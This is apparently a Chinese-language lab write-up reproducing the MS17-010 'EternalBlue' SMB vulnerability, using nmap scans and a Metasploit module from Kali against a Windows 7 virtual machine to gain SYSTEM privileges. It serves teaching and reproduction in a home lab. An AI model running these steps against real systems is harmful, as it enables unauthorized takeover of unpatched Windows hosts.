MS17-010即“永恒之蓝”漏洞,利用Windows系统的SMB漏洞可以获取系统最高权限。本文对此漏洞进行复现。
一、准备阶段
首先靶机采用 win7 sp1 x64 版本 镜像链接:
https://pan.baidu.com/s/1UTImMhW_1p3t4ElA5s1_VQ
提取码:sv0j
ip信息:
使用kali进行攻击
二、漏洞检测
使用nmap进行扫描,两台虚拟机在同一网段,使用命令:nmap -sn 192.168.31.0/24
使用命令:nmap -O 192.168.31.128,查看是否开放了445端口
三、进行攻击
使用命令:msfconsole打开MSF命令台,出现msf6 > 的命令行即为成功
使用命令:search 17-010搜索,选择下面这个攻击模块
之后查看options,填入yes标签的参数,我只有rhost需要填
填入命令 set RHOST 192.168.31.128(ip为win7的IP)
润一下,出现以下字样即为攻击成功
之后输入ipconfig,结果为win7的信息:
输入getuid为system权限
攻击成功!!!!!